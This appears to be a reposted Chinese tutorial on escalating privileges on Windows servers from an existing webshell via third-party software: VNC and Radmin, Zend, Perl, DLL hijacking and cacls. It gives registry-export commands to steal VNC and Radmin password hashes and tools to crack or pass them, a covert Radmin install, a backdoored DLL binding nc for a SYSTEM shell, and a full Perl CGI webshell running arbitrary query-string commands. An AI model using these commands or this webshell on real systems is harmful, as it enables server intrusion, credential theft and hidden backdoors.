0x01. VNC提權

這些第三方軟件的提權也是建立在獲取webshell的基礎上

1.1 環境部署

雙擊安裝vnc

搭建環境的話 , vnc服務端和客戶端都安裝一下

安裝完成點擊確定 , 設置連接密碼 : 123456

打開注冊機 , 獲取key : R8NLH-CQW8E-QMA7E-VQ3VQ-JCEJA

粘貼進入 , 點擊ok , 雙擊打開 , 測試連接

只要是任意一臺vnc的客戶端 , 知道了這臺服務器的ip以及連接的密碼 , 都可以通過vnc客戶端進行遠程管理服務

器 , 具體的操作權限取決于vnc服務端中的options選項配置的參數

vnc端口號 : 5900

1.2 讀取vnc密碼

通過webshell自帶的功能讀取

不一定能讀的到 , 我這里測試就沒有讀到 , 哈哈哈哈 , 如果讀不到可以嘗試在菜刀終端執行以下命令

前提是你當前的webshell的權限是可以讀取注冊表的

Cmd /c "regedit /e c:\123.reg "HKEY_LOCAL_MACHINE\software\RealVNC\WinVNC4" "
        /c不回顯     /e 導出注冊表   具體導出的內容

下載到本地 , 并用記事本打開 , 然后用工具vncx4.exe破解密碼

命令 : 
vncx4.exe -W

vnc的密碼保存在注冊表中 , 這個破解工具和密碼的復雜度無關

0x02. Radmin提權

Radmin 是一款屢獲殊榮的安全遠程控制軟件,詳細介紹請查看官方網站: http://www.radmin.cn

這款軟件非常不錯 , 速度也快 , 既可以作為遠程管理服務器的工具 , 也可以當做一個遠程馬 ,也是收費軟件

2.1 Radmin安裝

進入到radmin的文件夾下 , cmd下運行server.exe /setup

設置密碼 , 尷尬默認密碼策略最少8位 , 新密碼: 12345678

設置參數 , 隱藏狀態欄圖標 , 默認端口 : 4899

輸入注冊碼 , 注冊碼在radmin文件下有

點擊安裝服務 , 雙擊server.exe

2.2 測試連接

整個過程你在服務器上都察覺不到安裝了radmin , 測試連接 , 雙擊radmin.exe連接

右鍵有很多功能 , 文件管理 , 語音聊天 , 鎖定鍵盤等等 , 就不一一演示了,

2.3 讀取密碼

前提是你當前的webshell的權限是可以讀取注冊表的

我們的重點是如何基于webshe如果對方服務器裝了radmi , 我們如何拿到他的密碼 , 通過webshell自帶的功能讀

取radmin密碼

02BA5E187E2589BE6F80DA0046AA7E3C    注意這里大小寫有問題

02ba5e187e2589be6f80da0046aa7e3c

radmin的密碼也是在注冊表中 , 也可以通過命令導出 , 然后通過菜刀下載到本地

cmd /c "regedit /e c:\1234.reg "HKEY_LOCAL_MACHINE\system\RAdmin\v2.0\Server\""

然后通過cmd5網站解密 , 當然也有一個不錯的辦法 , 就是通過32位hash連接 , 這個需要特殊的radmin版本

Radmin_Hash.exe

然后輸入32hash值就可以連接了

0x03. Zend提權

當PHP網站搭建好之后 , 運維人員可能會安裝一個Zend , 用來加速php的 , 一般服務器安裝了Zend就算服務器

C:\Program Files\設置過權限，Zend會自動會把C:\Program Files\Zend\ZendOptimizer-3.3.0\下的目錄權限

設為 Everyone 權限 , 這導致入侵者能寫入文件

本質是利用的Zend的權限漏洞

3.1 安裝PHPnow

因為phpstudy中沒有Zend這個東東 , 所以才安裝phpnow

別忘記前提是有了webshell , 為了試驗方便 , 直接上傳一個webshell

下載路徑 : http://servkit.org/?from=phpnow.org

雙擊PnCp.cmd , 輸入20, 啟動服務 , 網站根目錄為htdocs

http://192.168.1.108:8080/index.php

菜刀連接一句話木馬

2.2 提權

具體步驟 :

1、通過webshell上傳nc和cmd到遠程服務器zendextensionmanager.dll目錄
2、復制一份zendextensionmanager.dll重命名，把原有的zendextensionmanager.dll也改名，
     再通過Zend_DLL_Hijacking_for_nc.exe生成一個帶后門的zendextensionmanager.dll上傳到目標服務器

zendextensionmanager.dll目錄

這是我的演示機的路徑 C:\PHPnow\ZendOptimizer\

3、重啟apache加載 , 通過webshell運行PnCp.cmd
4、telnet ip  端口 登錄目錄服務器

telnet 192.168.1.108 1234

這樣就可以在命令行操作對方的電腦了 , 還是system權限 , 這類似是一個軟件綁定 , 我們把nc和dll和cmd三個綁

定在了一起 , 當apache重啟的時候 , 就會啟動zend加速 , 也會啟動綁定的nc , 這樣就實現了通過zend加速提權

0x04. Dll劫持提權

dll劫持是指可以劫持服務器操作系統中的任意exe文件 , 如qq ,微信 , 騰云會議等等 , 這個真不錯

利用的本質就是當服務器運行劫持的exe文件后 , 也會運行我們的木馬

4.1 生成劫持

注意文件名只能是LPK.dll , 生成之后千萬別再點那個exe文件了 , 要不然會在你本機生成后門 , 將文件通過菜刀

上傳到服務器上 , 當有exe文件運行的時候 , 就會觸發我們的后門運行

4.2 劫持步驟

因為要有exe運行 , 所以我在自己的環境中就自己雙擊exe運行 , 你最好放在會有exe運行的目錄下

通過3389連接服務器

連續點擊5次shift , 然后鼠標點擊最后一個。（句號），同時按住AB鍵 ， 輸入密碼

0x05. 啟動項提權

這個方法和mysql中的那個啟動項提權本質一樣 , 就是把我們的木馬寫到啟動項中 , 但是一般很難成功 , 因為普通

用戶的權限是沒辦法寫入到啟動項的 , 如果有這樣的權限 , 直接通過webshell傳一個cs木馬 , 然后運行 , 這樣豈不

是更簡單。所以你知道有這個方法 ， 就不具體顯示了 ， 因為很難遇到

0x06. 服務替換提權

我們要修改的主要是隨服務一起啟動的程序，我們可以通過WebShell上的服務查看組件看到有哪些服務是在運行

的，有一個規律，就是不要找在WINDOWS目錄或者程序目錄下的文件，這兩個目錄是默為沒有修改的權限的，

安裝在其它目錄的程序可被替換的成功率比較大 ， 但是這個服務一般啟動不成功 ， 因為你破壞了服務 ，操作

系統就不會再啟動了 ， 很雞肋 ，不是很好用 ， 也不講了 ， 可以自行百度 。

0x07. Perl提權

Perl是一種最廣泛應用于語法分析和 World Wide Web的編程語言。它起源于 awk、C、sh 和 sed 語言，然

而，它的應用開發遠比其他任何一種面向對象編程語言更加容易。

PERL在默認安裝時BIN目錄是具有EVERYONE的完全控制權限和CGI執行權限的,所以能執行任意命令,這是一個

NTFS權限導至的提權漏洞。

#!/usr/bin/perlbinmode(STDOUT);syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);$_ = $ENV{QUERY_STRING};s/%20/ /ig;s/%2f/\//ig;$execthis = $_;syswrite(STDOUT, "\r\n", 13);open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";system($execthis);syswrite(STDOUT, "\r\n\r\n", 17);close(STDERR);close(STDOUT);exit;

0x08. Cacls命令在權限中的應用

有經驗的管理員喜歡把首頁文件設置IUSER用戶沒有寫權限,用來防止被掛木馬或者將NET.EXE、FTP.EXE等工具

設置不給IUSER用戶使用權限,讓我們無法用NET.exe、USER建帳號或FTP下載文件,我們可以利用Cacls 修改權限

后再正常使用。

cacls c:\index.asp /t /e /c /g interactive:f把index.asp加入interactive組并賦予完全控制權限(IIS的IUSER_用戶

就在這一組中).這樣就可以對index.asp任意編輯。

Cacls filename [/T] [/E] [/C] [/G usererm] [/R user [...]] [/P usererm [...]] [/D user [...]]Filename：顯示訪問控制列表(以下簡稱ACL)/T：更改當前目錄及其所有子目錄中指定文件的ACL/E：編輯ACL而不替換/C：在出現拒絕訪問錯誤時繼續 /G Userer:perm：賦予指定用戶訪問權限，Perm代表不同級別的訪問權限，其值可以是R(讀取)、W(寫入)、C(更改，寫入)、F(完全控制)等。/R user：撤銷指定用戶的訪問權限，注意該參數僅在與“/E”一起使用時有效。/P user：perm：替換指定用戶的訪問權限，perm的含義同前，但增加了“N(無)”的選項。/D user：拒絕指定用戶的訪問

0x09. 總結

現在很多提權都是集中在cs中 , 因為有很多插件可以一鍵提權 , 一方便不用下載那么多的工具 , 而且很節約時間

總結

以上是生活随笔為你收集整理的21.第三方软件提权(下)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。